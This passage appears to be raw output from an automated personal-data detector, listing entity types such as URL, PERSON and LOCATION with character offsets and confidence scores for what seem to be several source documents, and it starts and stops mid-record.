end: 1699, score: 0.5, type: URL, start: 1757, end: 1763, score: 0.5, type: URL, start: 1784, end: 1793, score: 0.5, type: URL, start: 1855, end: 1864, score: 0.5, type: URL, start: 2167, end: 2172, score: 0.5, type: URL, start: 2246, end: 2255, score: 0.5, type: URL, start: 2337, end: 2347, score: 0.5, type: URL, start: 2381, end: 2390, score: 0.5, type: URL, start: 2435, end: 2443, score: 0.5, type: URL, start: 2474, end: 2480, score: 0.5, type: URL, start: 2532, end: 2541, score: 0.5, type: URL, start: 2604, end: 2610, score: 0.5, type: URL, start: 2662, end: 2671, score: 0.5, type: URL, start: 2735, end: 2741, score: 0.5, type: URL, start: 2762, end: 2771, score: 0.5, type: URL, start: 2829, end: 2835, score: 0.5, type: URL, start: 2856, end: 2865, score: 0.5, type: URL, start: 2927, end: 2936, score: 0.5, type: EMAIL_ADDRESS, start: 936, end: 951, score: 1.0, type: DATE_TIME, start: 73, end: 77, score: 0.85, type: PERSON, start: 925, end: 951, score: 0.85, type: DATE_TIME, start: 1776, end: 1790, score: 0.85, type: PERSON, start: 8105, end: 8109, score: 0.85, type: LOCATION, start: 8363, end: 8383, score: 0.85, type: LOCATION, start: 9259, end: 9292, score: 0.85, type: PERSON, start: 9760, end: 9764, score: 0.85, type: DATE_TIME, start: 9936, end: 9953, score: 0.85, type: PERSON, start: 12045, end: 12051, score: 0.85, type: DATE_TIME, start: 13377, end: 13393, score: 0.85, type: DATE_TIME, start: 13485, end: 13502, score: 0.85, type: DATE_TIME, start: 15104, end: 15108, score: 0.85, type: PERSON, start: 17068, end: 17074, score: 0.85, type: PERSON, start: 17271, end: 17275, score: 0.85, type: PERSON, start: 17345, end: 17351, score: 0.85, type: DATE_TIME, start: 18834, end: 18841, score: 0.85, type: PERSON, start: 19525, end: 19533, score: 0.85, type: LOCATION, start: 19991, end: 20000, score: 0.85, type: PERSON, start: 20302, end: 20324, score: 0.85, type: LOCATION, start: 20345, end: 20354, score: 0.85, type: DATE_TIME, start: 20507, end: 20527, score: 0.85, type: DATE_TIME, start: 20672, end: 20686, score: 0.85, type: PERSON, start: 20941, end: 20959, score: 0.85, type: PERSON, start: 22061, end: 22073, score: 0.85, type: PERSON, start: 22214, end: 22226, score: 0.85, type: DATE_TIME, start: 22622, end: 22644, score: 0.85, type: LOCATION, start: 27266, end: 27275, score: 0.85, type: LOCATION, start: 27893, end: 27902, score: 0.85, type: LOCATION, start: 28070, end: 28079, score: 0.85, type: LOCATION, start: 31522, end: 31531, score: 0.85, type: LOCATION, start: 31594, end: 31603, score: 0.85, type: PERSON, start: 31658, end: 31676, score: 0.85, type: URL, start: 31658, end: 31664, score: 0.85, type: LOCATION, start: 31737, end: 31746, score: 0.85, type: LOCATION, start: 31940, end: 31949, score: 0.85, type: URL, start: 32316, end: 32322, score: 0.85, type: URL, start: 32633, end: 32643, score: 0.85, type: URL, start: 32667, end: 32673, score: 0.85, type: PERSON, start: 33345, end: 33362, score: 0.85, type: LOCATION, start: 33370, end: 33388, score: 0.85, type: PERSON, start: 33398, end: 33404, score: 0.85, type: PERSON, start: 34395, end: 34408, score: 0.85, type: PERSON, start: 35860, end: 35873, score: 0.85, type: DATE_TIME, start: 36076, end: 36083, score: 0.85, type: LOCATION, start: 36409, end: 36431, score: 0.85, type: DATE_TIME, start: 36472, end: 36479, score: 0.85, type: LOCATION, start: 36681, end: 36710, score: 0.85, type: DATE_TIME, start: 37151, end: 37163, score: 0.85, type: PERSON, start: 37244, end: 37247, score: 0.85, type: PERSON, start: 37655, end: 37664, score: 0.85, type: DATE_TIME, start: 37959, end: 37966, score: 0.85, type: PERSON, start: 38281, end: 38290, score: 0.85, type: PERSON, start: 38709, end: 38728, score: 0.85, type: DATE_TIME, start: 39131, end: 39150, score: 0.85, type: DATE_TIME, start: 39408, end: 39427, score: 0.85, type: PERSON, start: 40364, end: 40401, score: 0.85, type: PERSON, start: 40407, end: 40434, score: 0.85, type: PERSON, start: 41732, end: 41745, score: 0.85, type: PERSON, start: 41767, end: 41779, score: 0.85, type: LOCATION, start: 43348, end: 43369, score: 0.85, type: PERSON, start: 44607, end: 44628, score: 0.85, type: PERSON, start: 45062, end: 45075, score: 0.85, type: PERSON, start: 45239, end: 45260, score: 0.85, type: PERSON, start: 45310, end: 45336, score: 0.85, type: PERSON, start: 45815, end: 45849, score: 0.85, type: PERSON, start: 45996, end: 46022, score: 0.85, type: PERSON, start: 47134, end: 47138, score: 0.85, type: PERSON, start: 47309, end: 47343, score: 0.85, type: PERSON, start: 47722, end: 47727, score: 0.85, type: PERSON, start: 47764, end: 47769, score: 0.85, type: PERSON, start: 47944, end: 47949, score: 0.85, type: PERSON, start: 48168, end: 48184, score: 0.85, type: DATE_TIME, start: 48969, end: 48982, score: 0.85, type: PERSON, start: 49242, end: 49250, score: 0.85, type: DATE_TIME, start: 51206, end: 51213, score: 0.85, type: DATE_TIME, start: 51927, end: 51934, score: 0.85, type: LOCATION, start: 52363, end: 52368, score: 0.85, type: LOCATION, start: 52414, end: 52419, score: 0.85, type: LOCATION, start: 56213, end: 56230, score: 0.85, type: PERSON, start: 56452, end: 56456, score: 0.85, type: PERSON, start: 56475, end: 56480, score: 0.85, type: PERSON, start: 57951, end: 57956, score: 0.85, type: LOCATION, start: 58481, end: 58501, score: 0.85, type: URL, start: 725, end: 753, score: 0.6, type: URL, start: 760, end: 773, score: 0.5, type: URL, start: 942, end: 951, score: 0.5, type: URL, start: 1425, end: 1435, score: 0.5, type: URL, start: 2281, end: 2293, score: 0.5, type: URL, start: 2336, end: 2348, score: 0.5, type: URL, start: 2363, end: 2370, score: 0.5, type: URL, start: 2397, end: 2403, score: 0.5, type: URL, start: 2499, end: 2505, score: 0.5, type: URL, start: 2509, end: 2516, score: 0.5, type: URL, start: 2535, end: 2541, score: 0.5, type: URL, start: 2566, end: 2578, score: 0.5, type: URL, start: 2912, end: 2918, score: 0.5, type: URL, start: 3418, end: 3425, score: 0.5, type: URL, start: 3446, end: 3454, score: 0.5, type: URL, start: 3479, end: 3486, score: 0.5, type: URL, start: 3512, end: 3519, score: 0.5, type: URL, start: 3547, end: 3555, score: 0.5, type: URL, start: 3572, end: 3579, score: 0.5, type: URL, start: 3598, end: 3605, score: 0.5, type: URL, start: 3625, end: 3632, score: 0.5, type: URL, start: 3651, end: 3658, score: 0.5, type: URL, start: 3678, end: 3685, score: 0.5, type: URL, start: 4366, end: 4373, score: 0.5, type: URL, start: 4391, end: 4398, score: 0.5, type: URL, start: 4419, end: 4426, score: 0.5, type: URL, start: 4451, end: 4458, score: 0.5, type: URL, start: 4482, end: 4489, score: 0.5, type: URL, start: 5055, end: 5074, score: 0.5, type: URL, start: 5115, end: 5121, score: 0.5, type: URL, start: 5188, end: 5195, score: 0.5, type: URL, start: 5297, end: 5304, score: 0.5, type: URL, start: 5733, end: 5752, score: 0.5, type: URL, start: 5806, end: 5812, score: 0.5, type: URL, start: 5877, end: 5884, score: 0.5, type: URL, start: 6444, end: 6458, score: 0.5, type: URL, start: 6721, end: 6728, score: 0.5, type: URL, start: 7030, end: 7038, score: 0.5, type: URL, start: 7065, end: 7072, score: 0.5, type: URL, start: 7310, end: 7318, score: 0.5, type: URL, start: 7368, end: 7376, score: 0.5, type: URL, start: 7415, end: 7423, score: 0.5, type: URL, start: 7490, end: 7498, score: 0.5, type: URL, start: 7571, end: 7577, score: 0.5, type: URL, start: 7666, end: 7674, score: 0.5, type: URL, start: 7681, end: 7688, score: 0.5, type: URL, start: 7713, end: 7720, score: 0.5, type: URL, start: 7748, end: 7756, score: 0.5, type: URL, start: 7759, end: 7768, score: 0.5, type: URL, start: 7791, end: 7799, score: 0.5, type: URL, start: 8257, end: 8271, score: 0.5, type: URL, start: 8296, end: 8303, score: 0.5, type: URL, start: 8367, end: 8374, score: 0.5, type: URL, start: 8806, end: 8814, score: 0.5, type: URL, start: 8870, end: 8878, score: 0.5, type: URL, start: 9209, end: 9221, score: 0.5, type: URL, start: 9281, end: 9288, score: 0.5, type: URL, start: 9397, end: 9409, score: 0.5, type: URL, start: 9600, end: 9607, score: 0.5, type: URL, start: 10637, end: 10644, score: 0.5, type: URL, start: 10688, end: 10695, score: 0.5, type: URL, start: 10721, end: 10728, score: 0.5, type: URL, start: 10752, end: 10759, score: 0.5, type: URL, start: 11026, end: 11032, score: 0.5, type: URL, start: 11420, end: 11426, score: 0.5, type: URL, start: 11455, end: 11463, score: 0.5, type: URL, start: 11500, end: 11507, score: 0.5, type: URL, start: 11980, end: 11987, score: 0.5, type: URL, start: 12123, end: 12130, score: 0.5, type: URL, start: 12158, end: 12164, score: 0.5, type: URL, start: 12305, end: 12311, score: 0.5, type: URL, start: 12333, end: 12339, score: 0.5, type: URL, start: 12392, end: 12397, score: 0.5, type: URL, start: 12778, end: 12784, score: 0.5, type: URL, start: 12806, end: 12812, score: 0.5, type: URL, start: 12889, end: 12898, score: 0.5, type: URL, start: 13800, end: 13807, score: 0.5, type: URL, start: 13908, end: 13914, score: 0.5, type: URL, start: 14036, end: 14042, score: 0.5, type: URL, start: 14076, end: 14082, score: 0.5, type: URL, start: 14306, end: 14312, score: 0.5, type: URL, start: 14344, end: 14350, score: 0.5, type: URL, start: 14374, end: 14380, score: 0.5, type: URL, start: 14504, end: 14510, score: 0.5, type: URL, start: 14747, end: 14753, score: 0.5, type: URL, start: 14785, end: 14791, score: 0.5, type: URL, start: 15213, end: 15219, score: 0.5, type: URL, start: 15278, end: 15284, score: 0.5, type: URL, start: 15299, end: 15306, score: 0.5, type: URL, start: 15341, end: 15347, score: 0.5, type: URL, start: 15379, end: 15385, score: 0.5, type: URL, start: 15733, end: 15739, score: 0.5, type: URL, start: 15788, end: 15794, score: 0.5, type: URL, start: 15810, end: 15817, score: 0.5, type: URL, start: 15855, end: 15861, score: 0.5, type: URL, start: 15905, end: 15911, score: 0.5, type: URL, start: 15952, end: 15967, score: 0.5, type: URL, start: 15970, end: 15976, score: 0.5, type: URL, start: 16015, end: 16022, score: 0.5, type: URL, start: 16160, end: 16166, score: 0.5, type: URL, start: 16495, end: 16501, score: 0.5, type: URL, start: 16554, end: 16560, score: 0.5, type: URL, start: 16589, end: 16604, score: 0.5, type: URL, start: 16626, end: 16633, score: 0.5, type: URL, start: 16671, end: 16683, score: 0.5, type: URL, start: 18033, end: 18040, score: 0.5, type: URL, start: 18081, end: 18088, score: 0.5, type: URL, start: 18136, end: 18143, score: 0.5, type: URL, start: 18161, end: 18168, score: 0.5, type: URL, start: 18204, end: 18211, score: 0.5, type: URL, start: 18383, end: 18392, score: 0.5, type: URL, start: 18490, end: 18497, score: 0.5, type: URL, start: 18757, end: 18764, score: 0.5, type: URL, start: 18786, end: 18793, score: 0.5, type: URL, start: 18936, end: 18943, score: 0.5, type: URL, start: 18960, end: 18967, score: 0.5, type: URL, start: 19011, end: 19018, score: 0.5, type: URL, start: 19446, end: 19453, score: 0.5, type: URL, start: 19473, end: 19480, score: 0.5, type: URL, start: 19547, end: 19554, score: 0.5, type: URL, start: 19668, end: 19674, score: 0.5, type: URL, start: 19749, end: 19758, score: 0.5, type: URL, start: 19805, end: 19813, score: 0.5, type: URL, start: 19831, end: 19838, score: 0.5, type: URL, start: 19886, end: 19893, score: 0.5, type: URL, start: 19952, end: 19958, score: 0.5, type: URL, start: 20302, end: 20308, score: 0.5, type: URL, start: 20392, end: 20400, score: 0.5, type: URL, start: 20941, end: 20948, score: 0.5, type: URL, start: 21010, end: 21032, score: 0.5, type: URL, start: 21118, end: 21125, score: 0.5, type: URL, start: 21158, end: 21165, score: 0.5, type: URL, start: 21253, end: 21260, score: 0.5, type: URL, start: 21366, end: 21373, score: 0.5, type: URL, start: 21482, end: 21504, score: 0.5, type: URL, start: 21597, end: 21604, score: 0.5, type: URL, start: 21668, end: 21675, score: 0.5, type: URL, start: 22102, end: 22109, score: 0.5, type: URL, start: 22492, end: 22499, score: 0.5, type: URL, start: 22673, end: 22680, score: 0.5, type: URL, start: 22820, end: 22827, score: 0.5, type: URL, start: 22887, end: 22894, score: 0.5, type: URL, start: 23023, end: 23034, score: 0.5, type: URL, start: 23059, end: 23068, score: 0.5, type: URL, start: 23297, end: 23303, score: 0.5, type: URL, start: 23373, end: 23384, score: 0.5, type: URL, start: 23418, end: 23427, score: 0.5, type: URL, start: 23791, end: 23802, score: 0.5, type: URL, start: 23833, end: 23842, score: 0.5, type: URL, start: 24605, end: 24612, score: 0.5, type: URL, start: 24680, end: 24689, score: 0.5, type: URL, start: 24734, end: 24748, score: 0.5, type: URL, start: 24790, end: 24799, score: 0.5, type: URL, start: 24842, end: 24856, score: 0.5, type: URL, start: 24981, end: 24993, score: 0.5, type: URL, start: 25052, end: 25058, score: 0.5, type: URL, start: 25062, end: 25068, score: 0.5, type: URL, start: 25113, end: 25125, score: 0.5, type: URL, start: 25188, end: 25194, score: 0.5, type: URL, start: 25198, end: 25204, score: 0.5, type: URL, start: 25253, end: 25265, score: 0.5, type: URL, start: 25327, end: 25333, score: 0.5, type: URL, start: 25337, end: 25343, score: 0.5, type: URL, start: 25571, end: 25578, score: 0.5, type: URL, start: 25701, end: 25708, score: 0.5, type: URL, start: 26015, end: 26022, score: 0.5, type: URL, start: 26239, end: 26246, score: 0.5, type: URL, start: 26586, end: 26592, score: 0.5, type: URL, start: 26658, end: 26665, score: 0.5, type: URL, start: 26808, end: 26817, score: 0.5, type: URL, start: 26896, end: 26905, score: 0.5, type: URL, start: 26961, end: 26970, score: 0.5, type: URL, start: 27003, end: 27012, score: 0.5, type: URL, start: 27222, end: 27228, score: 0.5, type: URL, start: 27458, end: 27467, score: 0.5, type: URL, start: 27517, end: 27528, score: 0.5, type: URL, start: 27561, end: 27572, score: 0.5, type: URL, start: 27658, end: 27664, score: 0.5, type: URL, start: 27768, end: 27777, score: 0.5, type: URL, start: 27936, end: 27947, score: 0.5, type: URL, start: 28030, end: 28036, score: 0.5, type: URL, start: 28384, end: 28391, score: 0.5, type: URL, start: 28438, end: 28445, score: 0.5, type: URL, start: 28468, end: 28475, score: 0.5, type: URL, start: 28634, end: 28644, score: 0.5, type: URL, start: 28673, end: 28680, score: 0.5, type: URL, start: 28719, end: 28726, score: 0.5, type: URL, start: 28798, end: 28804, score: 0.5, type: URL, start: 28882, end: 28889, score: 0.5, type: URL, start: 28922, end: 28929, score: 0.5, type: URL, start: 28967, end: 28973, score: 0.5, type: URL, start: 29231, end: 29242, score: 0.5, type: URL, start: 29265, end: 29272, score: 0.5, type: URL, start: 29296, end: 29305, score: 0.5, type: URL, start: 29327, end: 29333, score: 0.5, type: URL, start: 29402, end: 29413, score: 0.5, type: URL, start: 29438, end: 29447, score: 0.5, type: URL, start: 29734, end: 29741, score: 0.5, type: URL, start: 29818, end: 29825, score: 0.5, type: URL, start: 30232, end: 30239, score: 0.5, type: URL, start: 30659, end: 30666, score: 0.5, type: URL, start: 30798, end: 30805, score: 0.5, type: URL, start: 30900, end: 30907, score: 0.5, type: URL, start: 30959, end: 30965, score: 0.5, type: URL, start: 31869, end: 31879, score: 0.5, type: URL, start: 31974, end: 31981, score: 0.5, type: URL, start: 31997, end: 32004, score: 0.5, type: URL, start: 32027, end: 32033, score: 0.5, type: URL, start: 32125, end: 32132, score: 0.5, type: URL, start: 32145, end: 32152, score: 0.5, type: URL, start: 32175, end: 32181, score: 0.5, type: URL, start: 32350, end: 32361, score: 0.5, type: URL, start: 32416, end: 32423, score: 0.5, type: URL, start: 32478, end: 32489, score: 0.5, type: URL, start: 32895, end: 32901, score: 0.5, type: URL, start: 32908, end: 32918, score: 0.5, type: URL, start: 33162, end: 33172, score: 0.5, type: URL, start: 33184, end: 33190, score: 0.5, type: URL, start: 33201, end: 33206, score: 0.5, type: URL, start: 33217, end: 33227, score: 0.5, type: URL, start: 33345, end: 33351, score: 0.5, type: URL, start: 33466, end: 33476, score: 0.5, type: URL, start: 33479, end: 33484, score: 0.5, type: URL, start: 33495, end: 33505, score: 0.5, type: URL, start: 33512, end: 33518, score: 0.5, type: URL, start: 33714, end: 33723, score: 0.5, type: URL, start: 33907, end: 33916, score: 0.5, type: URL, start: 34150, end: 34159, score: 0.5, type: URL, start: 34305, end: 34314, score: 0.5, type: URL, start: 34484, end: 34493, score: 0.5, type: URL, start: 34684, end: 34693, score: 0.5, type: URL, start: 34902, end: 34911, score: 0.5, type: URL, start: 35092, end: 35101, score: 0.5, type: URL, start: 35332, end: 35341, score: 0.5, type: URL, start: 35477, end: 35486, score: 0.5, type: URL, start: 35728, end: 35737, score: 0.5, type: URL, start: 35906, end: 35915, score: 0.5, type: URL, start: 36301, end: 36310, score: 0.5, type: URL, start: 36634, end: 36643, score: 0.5, type: URL, start: 37008, end: 37017, score: 0.5, type: URL, start: 37282, end: 37291, score: 0.5, type: URL, start: 37456, end: 37465, score: 0.5, type: URL, start: 37608, end: 37617, score: 0.5, type: URL, start: 37780, end: 37789, score: 0.5, type: URL, start: 38190, end: 38199, score: 0.5, type: URL, start: 38349, end: 38358, score: 0.5, type: URL, start: 38497, end: 38506, score: 0.5, type: URL, start: 38672, end: 38681, score: 0.5, type: URL, start: 38847, end: 38856, score: 0.5, type: URL, start: 39017, end: 39026, score: 0.5, type: URL, start: 39057, end: 39067, score: 0.5, type: URL, start: 39092, end: 39101, score: 0.5, type: URL, start: 39184, end: 39194, score: 0.5, type: URL, start: 39215, end: 39224, score: 0.5, type: URL, start: 39326, end: 39336, score: 0.5, type: URL, start: 39365, end: 39374, score: 0.5, type: URL, start: 39511, end: 39521, score: 0.5, type: URL, start: 39538, end: 39548, score: 0.5, type: URL, start: 39568, end: 39578, score: 0.5, type: URL, start: 39716, end: 39721, score: 0.5, type: URL, start: 39751, end: 39756, score: 0.5, type: URL, start: 39787, end: 39792, score: 0.5, type: URL, start: 39822, end: 39827, score: 0.5, type: URL, start: 39870, end: 39875, score: 0.5, type: URL, start: 39900, end: 39905, score: 0.5, type: URL, start: 39929, end: 39937, score: 0.5, type: URL, start: 39960, end: 39969, score: 0.5, type: URL, start: 39992, end: 40001, score: 0.5, type: URL, start: 40016, end: 40024, score: 0.5, type: URL, start: 40034, end: 40043, score: 0.5, type: URL, start: 40123, end: 40128, score: 0.5, type: URL, start: 40372, end: 40377, score: 0.5, type: URL, start: 40416, end: 40426, score: 0.5, type: URL, start: 40468, end: 40478, score: 0.5, type: URL, start: 40523, end: 40536, score: 0.5, type: URL, start: 40671, end: 40677, score: 0.5, type: URL, start: 40909, end: 40919, score: 0.5, type: URL, start: 40954, end: 40964, score: 0.5, type: URL, start: 40992, end: 41002, score: 0.5, type: URL, start: 41017, end: 41023, score: 0.5, type: URL, start: 41030, end: 41040, score: 0.5, type: URL, start: 41202, end: 41207, score: 0.5, type: URL, start: 41493, end: 41503, score: 0.5, type: URL, start: 41531, end: 41540, score: 0.5, type: URL, start: 41638, end: 41648, score: 0.5, type: URL, start: 41653, end: 41663, score: 0.5, type: URL, start: 41670, end: 41680, score: 0.5, type: URL, start: 41695, end: 41705, score: 0.5, type: URL, start: 41709, end: 41719, score: 0.5, type: URL, start: 41767, end: 41777, score: 0.5, type: URL, start: 41863, end: 41873, score: 0.5, type: URL, start: 41954, end: 41963, score: 0.5, type: URL, start: 41996, end: 42005, score: 0.5, type: URL, start: 42012, end: 42021, score: 0.5, type: URL, start: 42036, end: 42045, score: 0.5, type: URL, start: 42237, end: 42247, score: 0.5, type: URL, start: 42287, end: 42296, score: 0.5, type: URL, start: 43246, end: 43256, score: 0.5, type: URL, start: 43281, end: 43291, score: 0.5, type: URL, start: 43334, end: 43344, score: 0.5, type: URL, start: 43348, end: 43358, score: 0.5, type: URL, start: 43397, end: 43407, score: 0.5, type: URL, start: 43433, end: 43443, score: 0.5, type: URL, start: 43454, end: 43463, score: 0.5, type: URL, start: 43473, end: 43479, score: 0.5, type: URL, start: 43663, end: 43673, score: 0.5, type: URL, start: 43792, end: 43804, score: 0.5, type: URL, start: 43975, end: 43981, score: 0.5, type: URL, start: 43994, end: 44000, score: 0.5, type: URL, start: 44055, end: 44064, score: 0.5, type: URL, start: 44073, end: 44079, score: 0.5, type: URL, start: 44134, end: 44143, score: 0.5, type: URL, start: 44360, end: 44367, score: 0.5, type: URL, start: 44522, end: 44528, score: 0.5, type: URL, start: 44889, end: 44899, score: 0.5, type: URL, start: 45062, end: 45069, score: 0.5, type: URL, start: 45154, end: 45160, score: 0.5, type: URL, start: 45428, end: 45438, score: 0.5, type: URL, start: 45523, end: 45528, score: 0.5, type: URL, start: 45599, end: 45609, score: 0.5, type: URL, start: 45614, end: 45624, score: 0.5, type: URL, start: 45824, end: 45834, score: 0.5, type: URL, start: 45837, end: 45847, score: 0.5, type: URL, start: 45862, end: 45868, score: 0.5, type: URL, start: 46040, end: 46050, score: 0.5, type: URL, start: 46157, end: 46167, score: 0.5, type: URL, start: 46620, end: 46626, score: 0.5, type: URL, start: 47318, end: 47328, score: 0.5, type: URL, start: 47331, end: 47341, score: 0.5, type: URL, start: 47431, end: 47441, score: 0.5, type: URL, start: 47611, end: 47621, score: 0.5, type: URL, start: 47730, end: 47740, score: 0.5, type: URL, start: 47795, end: 47801, score: 0.5, type: URL, start: 48090, end: 48096, score: 0.5, type: URL, start: 48312, end: 48322, score: 0.5, type: URL, start: 48469, end: 48479, score: 0.5, type: URL, start: 48660, end: 48665, score: 0.5, type: URL, start: 48695, end: 48699, score: 0.5, type: URL, start: 48787, end: 48800, score: 0.5, type: URL, start: 49133, end: 49139, score: 0.5, type: URL, start: 49152, end: 49158, score: 0.5, type: URL, start: 49421, end: 49428, score: 0.5, type: URL, start: 49659, end: 49668, score: 0.5, type: URL, start: 49678, end: 49683, score: 0.5, type: URL, start: 49996, end: 50002, score: 0.5, type: URL, start: 50107, end: 50113, score: 0.5, type: URL, start: 50127, end: 50133, score: 0.5, type: URL, start: 50659, end: 50666, score: 0.5, type: URL, start: 50731, end: 50738, score: 0.5, type: URL, start: 50997, end: 51003, score: 0.5, type: URL, start: 51084, end: 51090, score: 0.5, type: URL, start: 51106, end: 51112, score: 0.5, type: URL, start: 51301, end: 51307, score: 0.5, type: URL, start: 51317, end: 51323, score: 0.5, type: URL, start: 51352, end: 51358, score: 0.5, type: URL, start: 51423, end: 51429, score: 0.5, type: URL, start: 51433, end: 51440, score: 0.5, type: URL, start: 51447, end: 51453, score: 0.5, type: URL, start: 51502, end: 51508, score: 0.5, type: URL, start: 51513, end: 51519, score: 0.5, type: URL, start: 51770, end: 51776, score: 0.5, type: URL, start: 51798, end: 51808, score: 0.5, type: URL, start: 51975, end: 51981, score: 0.5, type: URL, start: 51991, end: 51997, score: 0.5, type: URL, start: 52023, end: 52029, score: 0.5, type: URL, start: 52057, end: 52067, score: 0.5, type: URL, start: 52138, end: 52144, score: 0.5, type: URL, start: 52148, end: 52155, score: 0.5, type: URL, start: 52162, end: 52168, score: 0.5, type: URL, start: 52221, end: 52227, score: 0.5, type: URL, start: 52232, end: 52238, score: 0.5, type: URL, start: 52531, end: 52537, score: 0.5, type: URL, start: 52580, end: 52586, score: 0.5, type: URL, start: 52590, end: 52597, score: 0.5, type: URL, start: 52687, end: 52692, score: 0.5, type: URL, start: 52706, end: 52712, score: 0.5, type: URL, start: 52822, end: 52829, score: 0.5, type: URL, start: 52850, end: 52856, score: 0.5, type: URL, start: 53047, end: 53052, score: 0.5, type: URL, start: 53089, end: 53095, score: 0.5, type: URL, start: 53137, end: 53143, score: 0.5, type: URL, start: 53367, end: 53373, score: 0.5, type: URL, start: 53420, end: 53438, score: 0.5, type: URL, start: 53466, end: 53484, score: 0.5, type: URL, start: 53499, end: 53506, score: 0.5, type: URL, start: 53525, end: 53531, score: 0.5, type: URL, start: 53550, end: 53556, score: 0.5, type: URL, start: 53582, end: 53588, score: 0.5, type: URL, start: 53592, end: 53599, score: 0.5, type: URL, start: 53659, end: 53665, score: 0.5, type: URL, start: 53702, end: 53708, score: 0.5, type: URL, start: 54019, end: 54026, score: 0.5, type: URL, start: 54053, end: 54060, score: 0.5, type: URL, start: 54121, end: 54128, score: 0.5, type: URL, start: 54143, end: 54149, score: 0.5, type: URL, start: 54173, end: 54180, score: 0.5, type: URL, start: 54530, end: 54536, score: 0.5, type: URL, start: 54590, end: 54596, score: 0.5, type: URL, start: 54771, end: 54777, score: 0.5, type: URL, start: 54781, end: 54788, score: 0.5, type: URL, start: 54795, end: 54802, score: 0.5, type: URL, start: 54830, end: 54837, score: 0.5, type: URL, start: 54856, end: 54862, score: 0.5, type: URL, start: 54895, end: 54901, score: 0.5, type: URL, start: 54930, end: 54936, score: 0.5, type: URL, start: 54966, end: 54972, score: 0.5, type: URL, start: 55097, end: 55103, score: 0.5, type: URL, start: 55107, end: 55114, score: 0.5, type: URL, start: 55121, end: 55128, score: 0.5, type: URL, start: 55156, end: 55163, score: 0.5, type: URL, start: 55166, end: 55175, score: 0.5, type: URL, start: 55198, end: 55204, score: 0.5, type: URL, start: 55237, end: 55243, score: 0.5, type: URL, start: 55289, end: 55295, score: 0.5, type: URL, start: 55428, end: 55434, score: 0.5, type: URL, start: 55438, end: 55445, score: 0.5, type: URL, start: 55452, end: 55459, score: 0.5, type: URL, start: 55482, end: 55488, score: 0.5, type: URL, start: 56080, end: 56085, score: 0.5, type: URL, start: 56115, end: 56126, score: 0.5, type: URL, start: 56213, end: 56218, score: 0.5, type: URL, start: 56270, end: 56280, score: 0.5, type: URL, start: 56400, end: 56410, score: 0.5, type: URL, start: 56429, end: 56434, score: 0.5, type: URL, start: 56483, end: 56493, score: 0.5, type: URL, start: 57063, end: 57070, score: 0.5, type: URL, start: 57113, end: 57119, score: 0.5, type: URL, start: 57289, end: 57296, score: 0.5, type: URL, start: 57470, end: 57476, score: 0.5, type: URL, start: 57521, end: 57527, score: 0.5, type: URL, start: 57564, end: 57570, score: 0.5, type: URL, start: 57604, end: 57610, score: 0.5, type: URL, start: 57638, end: 57644, score: 0.5, type: URL, start: 57687, end: 57694, score: 0.5, type: URL, start: 57729, end: 57735, score: 0.5, type: URL, start: 57772, end: 57778, score: 0.5, type: URL, start: 57798, end: 57804, score: 0.5, type: URL, start: 58242, end: 58248, score: 0.5, type: URL, start: 58283, end: 58289, score: 0.5, type: URL, start: 58370, end: 58376, score: 0.5, type: URL, start: 58392, end: 58398, score: 0.5, type: URL, start: 58436, end: 58442, score: 0.5, type: URL, start: 58549, end: 58555, score: 0.5, type: PERSON, start: 103, end: 112, score: 0.85, type: PERSON, start: 190, end: 201, score: 0.85, type: PERSON, start: 203, end: 216, score: 0.85, type: PERSON, start: 347, end: 351, score: 0.85, type: PERSON, start: 353, end: 362, score: 0.85, type: PERSON, start: 459, end: 467, score: 0.85, type: PERSON, start: 617, end: 635, score: 0.85, type: PERSON, start: 638, end: 646, score: 0.85, type: PERSON, start: 928, end: 937, score: 0.85, type: PERSON, start: 1008, end: 1013, score: 0.85, type: PERSON, start: 1015, end: 1025, score: 0.85, type: PERSON, start: 1077, end: 1095, score: 0.85, type: PERSON, start: 1125, end: 1130, score: 0.85, type: PERSON, start: 1139, end: 1143, score: 0.85, type: PERSON, start: 1224, end: 1228, score: 0.85, type: PERSON, start: 1261, end: 1266, score: 0.85, type: PERSON, start: 1463, end: 1472, score: 0.85, type: LOCATION, start: 1587, end: 1593, score: 0.85, type: PERSON, start: 1611, end: 1644, score: 0.85, type: PERSON, start: 1699, end: 1708, score: 0.85, type: PERSON, start: 1729, end: 1741, score: 0.85, type: NRP, start: 1813, end: 1820, score: 0.85, type: PERSON, start: 1891, end: 1911, score: 0.85, type: PERSON, start: 2337, end: 2346, score: 0.85, type: PERSON, start: 2393, end: 2405, score: 0.85, type: PERSON, start: 2452, end: 2467, score: 0.85, type: PERSON, start: 2742, end: 2751, score: 0.85, type: PERSON, start: 2865, end: 2874, score: 0.85, type: PERSON, start: 2891, end: 2896, score: 0.85, type: PERSON, start: 3012, end: 3017, score: 0.85, type: NRP, start: 3027, end: 3035, score: 0.85, type: PERSON, start: 3043, end: 3053, score: 0.85, type: PERSON, start: 3189, end: 3194, score: 0.85, type: PERSON, start: 3202, end: 3209, score: 0.85, type: PERSON, start: 3563, end: 3572, score: 0.85, type: URL, start: 741, end: 822, score: 0.6, type: URL, start: 838, end: 882, score: 0.6, type: URL, start: 1303, end: 1319, score: 0.6, type: URL, start: 1356, end: 1400, score: 0.6, type: URL, start: 2097, end: 2231, score: 0.6, type: URL, start: 2247, end: 2291, score: 0.6, type: URL, start: 2570, end: 2629, score: 0.6, type: URL, start: 2645, end: 2689, score: 0.6, type: URL, start: 3362, end: 3444, score: 0.6, type: URL, start: 3460, end: 3504, score: 0.6, type: URL, start: 4241, end: 4338, score: 0.6, type: URL, start: 4354, end: 4398, score: 0.6, type: URL, start: 156, end: 164, score: 0.5, type: URL, start: 978, end: 986, score: 0.5, type: URL, start: 1331, end: 1337, score: 0.5, type: URL, start: 1518, end: 1526, score: 0.5, type: URL, start: 2387, end: 2395, score: 0.5, type: URL, start: 2799, end: 2807, score: 0.5, type: URL, start: 3628, end: 3636, score: 0.5, type: URL, start: 4690, end: 4696, score: 0.5, type: EMAIL_ADDRESS, start: 627, end: 642, score: 1.0, type: URL, start: 709, end: 745, score: 0.95, type: PERSON, start: 336, end: 342, score: 0.85, type: PERSON, start: 589, end: 599, score: 0.85, type: PERSON, start: 1532, end: 1536, score: 0.85, type: IP_ADDRESS, start: 1072, end: 1073, score: 0.6, type: IP_ADDRESS, start: 1102, end: 1106, score: 0.6, type: URL, start: 148, end: 160, score: 0.5, type: URL, start: 424, end: 433, score: 0.5, type: URL, start: 439, end: 448, score: 0.5, type: URL, start: 478, end: 487, score: 0.5, type: URL, start: 515, end: 522, score: 0.5, type: URL, start: 633, end: 642, score: 0.5, type: URL, start: 1627, end: 